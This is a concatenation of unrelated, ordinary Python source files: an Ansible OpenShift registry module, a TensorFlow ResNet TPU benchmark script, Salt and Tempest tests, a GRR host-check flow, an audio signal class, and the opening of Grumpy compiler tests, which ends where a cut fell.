                            'mount_host': {'value': params['mount_host'], 'include': True},
                            'env_vars': {'value': params['env_vars'], 'include': False},
                            'volume_mounts': {'value': params['volume_mounts'], 'include': False},
                            'edits': {'value': params['edits'], 'include': False},
                            'tls_key': {'value': params['tls_key'], 'include': True},
                            'tls_certificate': {'value': params['tls_certificate'], 'include': True},
                           }

        # Do not always pass the daemonset and enforce-quota parameters because they are not understood
        # by old versions of oc.
        # Default value is false. So, it's safe to not pass an explicit false value to oc versions which
        # understand these parameters.
        if params['daemonset']:
            registry_options['daemonset'] = {'value': params['daemonset'], 'include': True}
        if params['enforce_quota']:
            registry_options['enforce_quota'] = {'value': params['enforce_quota'], 'include': True}

        rconfig = RegistryConfig(params['name'],
                                 params['namespace'],
                                 params['kubeconfig'],
                                 registry_options)


        ocregistry = Registry(rconfig, params['debug'])

        # Fetch the current cluster state once; every state below uses it.
        api_rval = ocregistry.get()

        state = params['state']
        ########
        # get
        ########
        if state == 'list':

            if api_rval['returncode'] != 0:
                return {'failed': True, 'msg': api_rval}

            return {'changed': False, 'results': api_rval, 'state': state}

        ########
        # Delete
        ########
        if state == 'absent':
            if not ocregistry.exists():
                return {'changed': False, 'state': state}

            if check_mode:
                return {'changed': True, 'msg': 'CHECK_MODE: Would have performed a delete.'}

            # Unsure as to why this is angry with the return type.
            # pylint: disable=redefined-variable-type
            api_rval = ocregistry.delete()

            if api_rval['returncode'] != 0:
                return {'failed': True, 'msg': api_rval}

            return {'changed': True, 'results': api_rval, 'state': state}

        if state == 'present':
            ########
            # Create
            ########
            if not ocregistry.exists():

                if check_mode:
                    return {'changed': True, 'msg': 'CHECK_MODE: Would have performed a create.'}

                api_rval = ocregistry.create()

                if api_rval['returncode'] != 0:
                    return {'failed': True, 'msg': api_rval}

                return {'changed': True, 'results': api_rval, 'state': state}

            ########
            # Update
            ########
            # 'force' skips the diff and always replaces the objects.
            if not params['force'] and not ocregistry.needs_update():
                return {'changed': False, 'state': state}

            if check_mode:
                return {'changed': True, 'msg': 'CHECK_MODE: Would have performed an update.'}

            api_rval = ocregistry.update()

            if api_rval['returncode'] != 0:
                return {'failed': True, 'msg': api_rval}

            return {'changed': True, 'results': api_rval, 'state': state}

        return {'failed': True, 'msg': 'Unknown state passed. %s' % state}

# -*- -*- -*- End included fragment: class/oc_adm_registry.py -*- -*- -*-

# -*- -*- -*- Begin included fragment: ansible/oc_adm_registry.py -*- -*- -*-

def main():
    '''
    ansible oc module for registry

    Parses module arguments, delegates all idempotency logic to
    Registry.run_ansible, and translates its result dict into the
    ansible exit protocol (exit_json / fail_json).
    '''

    # NOTE(review): Registry.run_ansible also handles state == 'list', which
    # is not listed in 'choices' here -- confirm whether it should be exposed.
    module = AnsibleModule(
        argument_spec=dict(
            state=dict(default='present', type='str',
                       choices=['present', 'absent']),
            debug=dict(default=False, type='bool'),
            namespace=dict(default='default', type='str'),
            name=dict(default=None, required=True, type='str'),

            kubeconfig=dict(default='/etc/origin/master/admin.kubeconfig', type='str'),
            images=dict(default=None, type='str'),
            latest_images=dict(default=False, type='bool'),
            labels=dict(default=None, type='dict'),
            ports=dict(default=['5000'], type='list'),
            replicas=dict(default=1, type='int'),
            selector=dict(default=None, type='str'),
            service_account=dict(default='registry', type='str'),
            mount_host=dict(default=None, type='str'),
            volume_mounts=dict(default=None, type='list'),
            env_vars=dict(default={}, type='dict'),
            edits=dict(default=[], type='list'),
            enforce_quota=dict(default=False, type='bool'),
            force=dict(default=False, type='bool'),
            daemonset=dict(default=False, type='bool'),
            tls_key=dict(default=None, type='str'),
            tls_certificate=dict(default=None, type='str'),
        ),

        supports_check_mode=True,
    )

    results = Registry.run_ansible(module.params, module.check_mode)
    if 'failed' in results:
        module.fail_json(**results)

    module.exit_json(**results)


if __name__ == '__main__':
    main()

# -*- -*- -*- End included fragment: ansible/oc_adm_registry.py -*- -*- -*-

# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Train a ResNet-50 model on ImageNet on TPU."""

from __future__ import absolute_import
from __future__ import division
from __future__ import print_function

import csv
import os
import re
import sys
import time

from absl import app
from absl import flags

import tensorflow.compat.v1 as tf

# For Cloud environment, add parent directory for imports
sys.path.append(os.path.dirname(os.path.abspath(sys.path[0])))

from official.resnet import imagenet_input    # pylint: disable=g-import-not-at-top
from official.resnet import resnet_main
from tensorflow.contrib import cluster_resolver as contrib_cluster_resolver
from tensorflow.contrib import tpu as contrib_tpu
from tensorflow.python.estimator import estimator


FLAGS = tf.flags.FLAGS

# Matches checkpoint data files ('model.ckpt-<step>.data...') and captures
# the global step in the named group 'gs'; used by eval mode in main().
CKPT_PATTERN = r'model\.ckpt-(?P<gs>[0-9]+)\.data'

flags.DEFINE_string(
    'data_dir_small', default=None,
    help=('The directory where the resized (160x160) ImageNet input data is '
          'stored. This is only to be used in conjunction with the '
          'resnet_benchmark.py script.'))
# NOTE(review): main() reads data_dir_small with image_size=128; confirm the
# 160x160 wording in the help text above.

flags.DEFINE_bool(
    'use_fast_lr', default=False,
    help=('Enabling this uses a faster learning rate schedule along with '
          'different image sizes in the input pipeline. This is only to be '
          'used in conjunction with the resnet_benchmark.py script.'))


# Number of training and evaluation images in the standard ImageNet dataset
NUM_TRAIN_IMAGES = 1281167
NUM_EVAL_IMAGES = 50000


def main(unused_argv):
  """Train or evaluate ResNet-50 on ImageNet for TPU benchmarking.

  In 'train' mode, trains (optionally with the fast-LR, multi-image-size
  schedule) and writes a START marker file used to timestamp the run.
  In 'eval' mode, evaluates every checkpoint found in the model dir and
  writes a results.tsv summary.
  """
  tpu_cluster_resolver = contrib_cluster_resolver.TPUClusterResolver(
      FLAGS.tpu, zone=FLAGS.tpu_zone, project=FLAGS.gcp_project)

  config = contrib_tpu.RunConfig(
      cluster=tpu_cluster_resolver,
      model_dir=FLAGS.model_dir,
      save_checkpoints_steps=FLAGS.iterations_per_loop,
      # Keep every checkpoint so eval mode can sweep all of them below.
      keep_checkpoint_max=None,
      tpu_config=contrib_tpu.TPUConfig(
          iterations_per_loop=FLAGS.iterations_per_loop,
          num_shards=FLAGS.num_cores,
          per_host_input_for_training=contrib_tpu.InputPipelineConfig.PER_HOST_V2))  # pylint: disable=line-too-long

  # Input pipelines are slightly different (with regards to shuffling and
  # preprocessing) between training and evaluation.
  imagenet_train = imagenet_input.ImageNetInput(
      is_training=True,
      data_dir=FLAGS.data_dir,
      use_bfloat16=True,
      transpose_input=FLAGS.transpose_input)
  imagenet_eval = imagenet_input.ImageNetInput(
      is_training=False,
      data_dir=FLAGS.data_dir,
      use_bfloat16=True,
      transpose_input=FLAGS.transpose_input)

  if FLAGS.use_fast_lr:
    resnet_main.LR_SCHEDULE = [    # (multiplier, epoch to start) tuples
        (1.0, 4), (0.1, 21), (0.01, 35), (0.001, 43)
    ]
    # Extra 128px ("small") and 288px ("large") pipelines used at the start
    # and end of a fast-LR run; the switch points are epochs 18 and 41.
    imagenet_train_small = imagenet_input.ImageNetInput(
        is_training=True,
        image_size=128,
        data_dir=FLAGS.data_dir_small,
        num_parallel_calls=FLAGS.num_parallel_calls,
        use_bfloat16=True,
        transpose_input=FLAGS.transpose_input,
        cache=True)
    imagenet_eval_small = imagenet_input.ImageNetInput(
        is_training=False,
        image_size=128,
        data_dir=FLAGS.data_dir_small,
        num_parallel_calls=FLAGS.num_parallel_calls,
        use_bfloat16=True,
        transpose_input=FLAGS.transpose_input,
        cache=True)
    imagenet_train_large = imagenet_input.ImageNetInput(
        is_training=True,
        image_size=288,
        data_dir=FLAGS.data_dir,
        num_parallel_calls=FLAGS.num_parallel_calls,
        use_bfloat16=True,
        transpose_input=FLAGS.transpose_input)
    imagenet_eval_large = imagenet_input.ImageNetInput(
        is_training=False,
        image_size=288,
        data_dir=FLAGS.data_dir,
        num_parallel_calls=FLAGS.num_parallel_calls,
        use_bfloat16=True,
        transpose_input=FLAGS.transpose_input)

  resnet_classifier = contrib_tpu.TPUEstimator(
      use_tpu=FLAGS.use_tpu,
      model_fn=resnet_main.resnet_model_fn,
      config=config,
      train_batch_size=FLAGS.train_batch_size,
      eval_batch_size=FLAGS.eval_batch_size)

  if FLAGS.mode == 'train':
    current_step = estimator._load_global_step_from_checkpoint_dir(FLAGS.model_dir)  # pylint: disable=protected-access,line-too-long
    batches_per_epoch = NUM_TRAIN_IMAGES / FLAGS.train_batch_size
    tf.logging.info('Training for %d steps (%.2f epochs in total). Current'
                    ' step %d.' % (FLAGS.train_steps,
                                   FLAGS.train_steps / batches_per_epoch,
                                   current_step))

    start_timestamp = time.time()  # This time will include compilation time

    # Write a dummy file at the start of training so that we can measure the
    # runtime at each checkpoint from the file write time.
    tf.gfile.MkDir(FLAGS.model_dir)
    if not tf.gfile.Exists(os.path.join(FLAGS.model_dir, 'START')):
      with tf.gfile.GFile(os.path.join(FLAGS.model_dir, 'START'), 'w') as f:
        f.write(str(start_timestamp))

    if FLAGS.use_fast_lr:
      # First 18 epochs at 128px, through epoch 41 at the default size, then
      # up to epoch 50 (capped by --train_steps) at 288px.
      small_steps = int(18 * NUM_TRAIN_IMAGES / FLAGS.train_batch_size)
      normal_steps = int(41 * NUM_TRAIN_IMAGES / FLAGS.train_batch_size)
      large_steps = int(min(50 * NUM_TRAIN_IMAGES / FLAGS.train_batch_size,
                            FLAGS.train_steps))

      resnet_classifier.train(
          input_fn=imagenet_train_small.input_fn, max_steps=small_steps)
      resnet_classifier.train(
          input_fn=imagenet_train.input_fn, max_steps=normal_steps)
      resnet_classifier.train(
          input_fn=imagenet_train_large.input_fn,
          max_steps=large_steps)
    else:
      resnet_classifier.train(
          input_fn=imagenet_train.input_fn, max_steps=FLAGS.train_steps)

  else:
    assert FLAGS.mode == 'eval'

    # START was written by the train run; its mtime anchors elapsed time.
    start_timestamp = tf.gfile.Stat(
        os.path.join(FLAGS.model_dir, 'START')).mtime_nsec
    results = []
    eval_steps = NUM_EVAL_IMAGES // FLAGS.eval_batch_size

    # Collect the global steps of all checkpoints present in the model dir.
    ckpt_steps = set()
    all_files = tf.gfile.ListDirectory(FLAGS.model_dir)
    for f in all_files:
      mat = re.match(CKPT_PATTERN, f)
      if mat is not None:
        ckpt_steps.add(int(mat.group('gs')))
    ckpt_steps = sorted(list(ckpt_steps))
    tf.logging.info('Steps to be evaluated: %s' % str(ckpt_steps))

    for step in ckpt_steps:
      ckpt = os.path.join(FLAGS.model_dir, 'model.ckpt-%d' % step)

      batches_per_epoch = NUM_TRAIN_IMAGES // FLAGS.train_batch_size
      current_epoch = step // batches_per_epoch

      # Pick the eval pipeline matching the image size this checkpoint was
      # trained at (fast-LR runs switch sizes at epochs 18 and 41).
      if FLAGS.use_fast_lr:
        if current_epoch < 18:
          eval_input_fn = imagenet_eval_small.input_fn
        if current_epoch >= 18 and current_epoch < 41:
          eval_input_fn = imagenet_eval.input_fn
        if current_epoch >= 41:
          eval_input_fn = imagenet_eval_large.input_fn
      else:
        eval_input_fn = imagenet_eval.input_fn

      # mtime_nsec is in nanoseconds; convert the delta to hours.
      end_timestamp = tf.gfile.Stat(ckpt + '.index').mtime_nsec
      elapsed_hours = (end_timestamp - start_timestamp) / (1e9 * 3600.0)

      tf.logging.info('Starting to evaluate.')
      eval_start = time.time()  # This time will include compilation time
      eval_results = resnet_classifier.evaluate(
          input_fn=eval_input_fn,
          steps=eval_steps,
          checkpoint_path=ckpt)
      eval_time = int(time.time() - eval_start)
      tf.logging.info('Eval results: %s. Elapsed seconds: %d' %
                      (eval_results, eval_time))
      results.append([
          current_epoch,
          elapsed_hours,
          '%.2f' % (eval_results['top_1_accuracy'] * 100),
          '%.2f' % (eval_results['top_5_accuracy'] * 100),
      ])

      # NOTE(review): 60s pause between per-checkpoint evaluations; reason
      # not documented here -- confirm before removing.
      time.sleep(60)

    # NOTE(review): csv.writer expects a text-mode file on Python 3; the
    # 'wb' mode here looks like Python 2 semantics -- confirm.
    with tf.gfile.GFile(os.path.join(FLAGS.model_dir, 'results.tsv'), 'wb') as tsv_file:   # pylint: disable=line-too-long
      writer = csv.writer(tsv_file, delimiter='\t')
      writer.writerow(['epoch', 'hours', 'top1Accuracy', 'top5Accuracy'])
      writer.writerows(results)


if __name__ == '__main__':
  tf.logging.set_verbosity(tf.logging.INFO)
  # app.run parses absl flags before invoking main(argv).
  app.run(main)

from socket import inet_ntoa
from struct import pack


def calcDottedNetmask(mask):
    """Convert a CIDR prefix length (0-32) into a dotted-quad netmask string.

    e.g. calcDottedNetmask(24) -> '255.255.255.0'
    """
    # Set the top `mask` bits of a 32-bit integer.  Uses range() instead of
    # the Python-2-only xrange(), which raises NameError on Python 3.
    bits = 0
    for i in range(32 - mask, 32):
        bits |= (1 << i)
    packed_value = pack('!I', bits)
    addr = inet_ntoa(packed_value)
    return addr

import pytest
import salt.engines
from tests.support.mock import MagicMock, patch


def test_engine_module_name():
    # The engine's name comes from the explicit ``name`` kwarg, not from the
    # ``foobar.start`` entry-point string passed positionally.
    engine = salt.engines.Engine({}, "foobar.start", {}, {}, {}, {}, name="foobar")
    assert engine.name == "foobar"


def test_engine_title_set():
    engine = salt.engines.Engine({}, "foobar.start", {}, {}, {}, {}, name="foobar")
    # run() must set the process title to the engine name even though it then
    # fails to resolve the nonexistent engine function.
    with patch("salt.utils.process.appendproctitle", MagicMock()) as mm:
        with pytest.raises(KeyError):
            # The method does not exist so a KeyError will be raised.
            engine.run()
        mm.assert_called_with("foobar")

# Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
#    Licensed under the Apache License, Version 2.0 (the "License"); you may
#    not use this file except in compliance with the License. You may obtain
#    a copy of the License at
#
#         http://www.apache.org/licenses/LICENSE-2.0
#
#    Unless required by applicable law or agreed to in writing, software
#    distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
#    WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
#    License for the specific language governing permissions and limitations
#    under the License.

from tempest.api.volume import base
from tempest.common import utils
from tempest.common import waiters
from tempest import config
from tempest.lib.common.utils import data_utils
from tempest.lib.common.utils import test_utils
from tempest.lib import decorators

CONF = config.CONF


class VolumesActionsTest(base.BaseVolumeTest):
    """Test volume actions"""

    # Attach/detach tests boot a server, which needs a network to exist.
    create_default_network = True

    @classmethod
    def resource_setup(cls):
        super(VolumesActionsTest, cls).resource_setup()

        # Create a test shared volume for attach/detach tests
        cls.volume = cls.create_volume()

    @decorators.idempotent_id('fff42874-7db5-4487-a8e1-ddda5fb5288d')
    @decorators.attr(type='smoke')
    @utils.services('compute')
    def test_attach_detach_volume_to_instance(self):
        """Test attaching and detaching volume to instance"""
        # Create a server
        server = self.create_server()
        # Volume is attached and detached successfully from an instance
        self.volumes_client.attach_volume(self.volume['id'],
                                          instance_uuid=server['id'],
                                          mountpoint='/dev/%s' %
                                          CONF.compute.volume_device_name)
        waiters.wait_for_volume_resource_status(self.volumes_client,
                                                self.volume['id'], 'in-use')
        self.volumes_client.detach_volume(self.volume['id'])
        waiters.wait_for_volume_resource_status(self.volumes_client,
                                                self.volume['id'], 'available')

    @decorators.idempotent_id('63e21b4c-0a0c-41f6-bfc3-7c2816815599')
    def test_volume_bootable(self):
        """Test setting and retrieving bootable flag of a volume"""
        for bool_bootable in [True, False]:
            self.volumes_client.set_bootable_volume(self.volume['id'],
                                                    bootable=bool_bootable)
            fetched_volume = self.volumes_client.show_volume(
                self.volume['id'])['volume']
            # Get Volume information
            # NOTE(masayukig): 'bootable' is "true" or "false" in the current
            # cinder implementation. So we need to cast boolean values to str
            # and make it lower to compare here.
            self.assertEqual(str(bool_bootable).lower(),
                             fetched_volume['bootable'])

    @decorators.idempotent_id('9516a2c8-9135-488c-8dd6-5677a7e5f371')
    @utils.services('compute')
    def test_get_volume_attachment(self):
        """Test getting volume attachments

        Attach a volume to a server, and then retrieve volume's attachments
        info.
        """
        # Create a server
        server = self.create_server()
        # Verify that a volume's attachment information is retrieved
        self.volumes_client.attach_volume(self.volume['id'],
                                          instance_uuid=server['id'],
                                          mountpoint='/dev/%s' %
                                          CONF.compute.volume_device_name)
        waiters.wait_for_volume_resource_status(self.volumes_client,
                                                self.volume['id'],
                                                'in-use')
        # addCleanup runs LIFO: the detach registered below executes first,
        # then this wait for the volume to return to 'available'.
        self.addCleanup(waiters.wait_for_volume_resource_status,
                        self.volumes_client,
                        self.volume['id'], 'available')
        self.addCleanup(self.volumes_client.detach_volume, self.volume['id'])
        volume = self.volumes_client.show_volume(self.volume['id'])['volume']
        attachment = volume['attachments'][0]

        self.assertEqual('/dev/%s' %
                         CONF.compute.volume_device_name,
                         attachment['device'])
        self.assertEqual(server['id'], attachment['server_id'])
        # NOTE(review): this asserts the attachment's 'id' equals the volume
        # id -- confirm against the block storage API reference.
        self.assertEqual(self.volume['id'], attachment['id'])
        self.assertEqual(self.volume['id'], attachment['volume_id'])

    @decorators.idempotent_id('d8f1ca95-3d5b-44a3-b8ca-909691c9532d')
    @utils.services('image')
    def test_volume_upload(self):
        """Test uploading volume to create an image"""
        # NOTE(gfidente): the volume uploaded in Glance comes from setUpClass,
        # it is shared with the other tests. After it is uploaded in Glance,
        # there is no way to delete it from Cinder, so we delete it from Glance
        # using the Glance images_client and from Cinder via tearDownClass.
        image_name = data_utils.rand_name(self.__class__.__name__ + '-Image')
        body = self.volumes_client.upload_volume(
            self.volume['id'], image_name=image_name,
            disk_format=CONF.volume.disk_format)['os-volume_upload_image']
        image_id = body["image_id"]
        self.addCleanup(test_utils.call_and_ignore_notfound_exc,
                        self.images_client.delete_image,
                        image_id)
        waiters.wait_for_image_status(self.images_client, image_id, 'active')
        waiters.wait_for_volume_resource_status(self.volumes_client,
                                                self.volume['id'], 'available')

        image_info = self.images_client.show_image(image_id)
        self.assertEqual(image_name, image_info['name'])
        self.assertEqual(CONF.volume.disk_format, image_info['disk_format'])

    @decorators.idempotent_id('92c4ef64-51b2-40c0-9f7e-4749fbaaba33')
    def test_reserve_unreserve_volume(self):
        """Test reserving and unreserving volume"""
        # Mark volume as reserved.
        self.volumes_client.reserve_volume(self.volume['id'])
        # To get the volume info
        body = self.volumes_client.show_volume(self.volume['id'])['volume']
        self.assertIn('attaching', body['status'])
        # Unmark volume as reserved.
        self.volumes_client.unreserve_volume(self.volume['id'])
        # To get the volume info
        body = self.volumes_client.show_volume(self.volume['id'])['volume']
        self.assertIn('available', body['status'])

    @decorators.idempotent_id('fff74e1e-5bd3-4b33-9ea9-24c103bc3f59')
    def test_volume_readonly_update(self):
        """Test updating and retrieve volume's readonly flag"""
        for readonly in [True, False]:
            # Update volume readonly
            self.volumes_client.update_volume_readonly(self.volume['id'],
                                                       readonly=readonly)
            # Get Volume information
            fetched_volume = self.volumes_client.show_volume(
                self.volume['id'])['volume']
            # NOTE(masayukig): 'readonly' is "True" or "False" in the current
            # cinder implementation. So we need to cast boolean values to str
            # to compare here.
            self.assertEqual(str(readonly),
                             fetched_volume['metadata']['readonly'])

#!/usr/bin/env python
"""A flow to run checks for a host."""
from grr.lib import aff4
from grr.lib import flow
from grr.lib import rdfvalue
from grr.lib.checks import checks
from grr.proto import flows_pb2


class CheckFlowArgs(rdfvalue.RDFProtoStruct):
  """Arguments accepted by the CheckRunner flow."""
  protobuf = flows_pb2.CheckFlowArgs


class CheckRunner(flow.GRRFlow):
  """This flow runs checks on a host.

  CheckRunner:
  - Identifies what checks should be run for a host.
  - Identifies the artifacts that need to be collected to perform those checks.
  - Orchestrates collection of the host data.
  - Routes host data to the relevant checks.
  - Returns check data ready for reporting.
  """
  friendly_name = "Run Checks"
  category = "/Checks/"
  behaviours = flow.GRRFlow.behaviours + "BASIC"

  @flow.StateHandler(next_state=["MapArtifactData"])
  def Start(self):
    """Initialize flow state from the client object, then begin mapping."""
    client = aff4.FACTORY.Open(self.client_id, token=self.token)
    self.state.Register("knowledge_base",
                        client.Get(client.Schema.KNOWLEDGE_BASE))
    self.state.Register("labels", client.GetLabels())
    self.state.Register("artifacts_wanted", set())
    self.state.Register("artifacts_fetched", set())
    self.state.Register("checks_run", [])
    self.state.Register("checks_with_findings", [])
    self.state.Register("results_store", None)
    self.state.Register("host_data", {})
    self.CallState(next_state="MapArtifactData")

  @flow.StateHandler(next_state=["AddResponses", "RunChecks"])
  def MapArtifactData(self, responses):
    """Get processed data, mapped to artifacts."""
    self.state.artifacts_wanted = checks.CheckRegistry.SelectArtifacts(
        os=self.state.knowledge_base.os)
    # Fetch Artifacts and map results to the artifacts that generated them.
    # This is an inefficient collection, but necessary because results need to
    # be mapped to the originating artifact. An alternative would be to have
    # rdfvalues labeled with originating artifact ids.
    for artifact_id in self.state.artifacts_wanted:
      self.CallFlow("ArtifactCollectorFlow", artifact_list=[artifact_id],
                    request_data={"artifact_id": artifact_id},
                    next_state="AddResponses")
    self.CallState(next_state="RunChecks")

  @flow.StateHandler()
  def AddResponses(self, responses):
    # Store each collection's responses keyed by the originating artifact id
    # (passed through request_data by MapArtifactData).
    artifact_id = responses.request_data["artifact_id"]
    # TODO(user): Check whether artifact collection succeeded.
    self.state.host_data[artifact_id] = list(responses)

  @flow.StateHandler(next_state=["Done"])
  def RunChecks(self, responses):
    """Run all checks over collected host data and reply with findings."""
    if not responses.success:
      raise RuntimeError("Checks did not run successfully.")
    # Hand host data across to checks. Do this after all data has been collected
    # in case some checks require multiple artifacts/results.
    for finding in checks.CheckHost(self.state.host_data,
                                    os=self.state.knowledge_base.os):
      self.state.checks_run.append(finding.check_id)
      if finding.anomaly:
        self.state.checks_with_findings.append(finding.check_id)
      self.SendReply(finding)


#!/usr/bin/python3
################################################################################
#
#	Copyright 2014 Stjepan Henc <sthenc@gmail.com>
#
#	Licensed under the Apache License, Version 2.0 (the "License");
#	you may not use this file except in compliance with the License.
#	You may obtain a copy of the License at
#
#		http://www.apache.org/licenses/LICENSE-2.0
#
#	Unless required by applicable law or agreed to in writing, software
#	distributed under the License is distributed on an "AS IS" BASIS,
#	WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#	See the License for the specific language governing permissions and
#	limitations under the License.
#
################################################################################

import scipy.io.wavfile as wav
import numpy as np
import copy

class Signal:
    """In-memory audio signal plus STFT/windowing metadata.

    Construction forms:
        Signal(filename)      -- load the waveform from a WAV file
        Signal(other_signal)  -- deep copy of another Signal instance
        Signal(waveform, fs)  -- wrap an existing sample array at rate fs
    """

    # Data loaders
    def LoadFromFile(self, file):
        """Read a WAV file; sets fs, s, sLength and nChans."""
        self.fs, self.s = wav.read(file)
        if self.s.ndim == 1:
            # Mono files come back as a 1-D array; normalize to
            # (nSamples, 1) so the shape unpack below always succeeds.
            self.s = self.s.reshape(-1, 1)
        self.sLength, self.nChans = self.s.shape

    def LoadWF(self, waveform, fs):
        """Wrap an in-memory waveform (samples x channels) sampled at fs."""
        self.s = waveform
        self.fs = fs
        if self.s.ndim == 1:
            # Accept mono 1-D input as well (generalization).
            self.s = self.s.reshape(-1, 1)
        self.sLength, self.nChans = self.s.shape

    def __init__(self, *args):

        # Signal properties
        self.singlePrecision = 0
        self.s = np.array([])
        self.fs = 44100
        self.sLength = 0
        self.nChans = 0
        self.weightingFunction = np.hamming  # FIXME: make configurable

        # STFT properties
        self.S = np.array([])
        self.windowLength = 60
        self.nfft = 0
        self.nfftUtil = 0
        self.overlapRatio = 0.5
        self.framesPositions = np.array([])
        self.nFrames = 0
        self.weightingWindow = np.array([])
        self.overlap = 0

        # Windowing properties (the original assigned these twice; the
        # duplicate assignments were removed).
        self.sWin = np.array([])
        self.sWeights = np.array([])

        if len(args) == 1:
            if isinstance(args[0], str):  # it's a filename
                self.LoadFromFile(args[0])
            # BUG FIX: the original wrote type(args[0] == type(self)), which
            # evaluates type(False/True) and is always truthy; use a proper
            # type check instead.
            elif isinstance(args[0], Signal):  # copy data from other signal
                self.__dict__ = copy.deepcopy(args[0].__dict__)
        elif len(args) == 2:  # args[0] is a waveform, args[1] is sample freq.
            # BUG FIX: the original called args(0)/args(1); a tuple is
            # indexed, not called.
            self.LoadWF(args[0], args[1])



# coding=utf-8

# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

"""Tests for StatementVisitor."""

from __future__ import unicode_literals

import re
import subprocess
import textwrap
import unittest

from grumpy_tools.compiler import block
from grumpy_tools.compiler import imputil
from grumpy_tools.compiler import shard_test
from grumpy_tools.compiler import stmt
from grumpy_tools.compiler import util
from grumpy_tools.vendor import pythonparser
from grumpy_tools.vendor.pythonparser import ast


class StatementVisitorTest(unittest.TestCase):
  """End-to-end tests for statement code generation.

  Most cases compile and run a small program through the grumpy toolchain
  (_GrumpRun) and assert on its (returncode, output); the rest parse and
  visit source directly (_ParseAndVisit) to assert on codegen errors.
  """

  def testAssertNoMsg(self):
    self.assertEqual((0, 'AssertionError()\n'), _GrumpRun(textwrap.dedent("""\
        try:
          assert False
        except AssertionError as e:
          print repr(e)""")))

  def testAssertMsg(self):
    want = (0, "AssertionError('foo',)\n")
    self.assertEqual(want, _GrumpRun(textwrap.dedent("""\
        try:
          assert False, 'foo'
        except AssertionError as e:
          print repr(e)""")))

  def testBareAssert(self):
    # Assertion errors at the top level of a block should raise:
    # https://github.com/google/grumpy/issues/18
    want = (0, 'ok\n')
    self.assertEqual(want, _GrumpRun(textwrap.dedent("""\
        def foo():
         assert False
        try:
         foo()
        except AssertionError:
         print 'ok'
        else:
         print 'bad'""")))

  def testAssignAttribute(self):
    self.assertEqual((0, '123\n'), _GrumpRun(textwrap.dedent("""\
        e = Exception()
        e.foo = 123
        print e.foo""")))

  def testAssignName(self):
    self.assertEqual((0, 'bar\n'), _GrumpRun(textwrap.dedent("""\
        foo = 'bar'
        print foo""")))

  def testAssignMultiple(self):
    self.assertEqual((0, 'baz baz\n'), _GrumpRun(textwrap.dedent("""\
        foo = bar = 'baz'
        print foo, bar""")))

  def testAssignSubscript(self):
    self.assertEqual((0, "{'bar': None}\n"), _GrumpRun(textwrap.dedent("""\
        foo = {}
        foo['bar'] = None
        print foo""")))

  def testAssignTuple(self):
    self.assertEqual((0, 'a b\n'), _GrumpRun(textwrap.dedent("""\
        baz = ('a', 'b')
        foo, bar = baz
        print foo, bar""")))

  def testAugAssign(self):
    self.assertEqual((0, '42\n'), _GrumpRun(textwrap.dedent("""\
        foo = 41
        foo += 1
        print foo""")))

  def testAugAssignBitAnd(self):
    self.assertEqual((0, '3\n'), _GrumpRun(textwrap.dedent("""\
        foo = 7
        foo &= 3
        print foo""")))

  def testAugAssignPow(self):
    self.assertEqual((0, '64\n'), _GrumpRun(textwrap.dedent("""\
        foo = 8
        foo **= 2
        print foo""")))

  def testClassDef(self):
    self.assertEqual((0, "<type 'type'>\n"), _GrumpRun(textwrap.dedent("""\
        class Foo(object):
          pass
        print type(Foo)""")))

  def testClassDefWithVar(self):
    self.assertEqual((0, 'abc\n'), _GrumpRun(textwrap.dedent("""\
        class Foo(object):
          bar = 'abc'
        print Foo.bar""")))

  def testDeleteAttribute(self):
    self.assertEqual((0, 'False\n'), _GrumpRun(textwrap.dedent("""\
        class Foo(object):
          bar = 42
        del Foo.bar
        print hasattr(Foo, 'bar')""")))

  def testDeleteClassLocal(self):
    self.assertEqual((0, 'False\n'), _GrumpRun(textwrap.dedent("""\
        class Foo(object):
          bar = 'baz'
          del bar
        print hasattr(Foo, 'bar')""")))

  def testDeleteGlobal(self):
    self.assertEqual((0, 'False\n'), _GrumpRun(textwrap.dedent("""\
        foo = 42
        del foo
        print 'foo' in globals()""")))

  def testDeleteLocal(self):
    self.assertEqual((0, 'ok\n'), _GrumpRun(textwrap.dedent("""\
        def foo():
          bar = 123
          del bar
          try:
            print bar
            raise AssertionError
          except UnboundLocalError:
            print 'ok'
        foo()""")))

  def testDeleteNonexistentLocal(self):
    self.assertRaisesRegexp(
        util.ParseError, 'cannot delete nonexistent local',
        _ParseAndVisit, 'def foo():\n  del bar')

  def testDeleteSubscript(self):
    self.assertEqual((0, '{}\n'), _GrumpRun(textwrap.dedent("""\
        foo = {'bar': 'baz'}
        del foo['bar']
        print foo""")))

  def testExprCall(self):
    self.assertEqual((0, 'bar\n'), _GrumpRun(textwrap.dedent("""\
        def foo():
          print 'bar'
        foo()""")))

  def testExprNameGlobal(self):
    self.assertEqual((0, ''), _GrumpRun(textwrap.dedent("""\
        foo = 42
        foo""")))

  def testExprNameLocal(self):
    self.assertEqual((0, ''), _GrumpRun(textwrap.dedent("""\
        foo = 42
        def bar():
          foo
        bar()""")))

  def testFor(self):
    self.assertEqual((0, '1\n2\n3\n'), _GrumpRun(textwrap.dedent("""\
        for i in (1, 2, 3):
          print i""")))

  def testForBreak(self):
    self.assertEqual((0, '1\n'), _GrumpRun(textwrap.dedent("""\
        for i in (1, 2, 3):
          print i
          break""")))

  def testForContinue(self):
    self.assertEqual((0, '1\n2\n3\n'), _GrumpRun(textwrap.dedent("""\
        for i in (1, 2, 3):
          print i
          continue
          raise AssertionError""")))

  def testForElse(self):
    self.assertEqual((0, 'foo\nbar\n'), _GrumpRun(textwrap.dedent("""\
        for i in (1,):
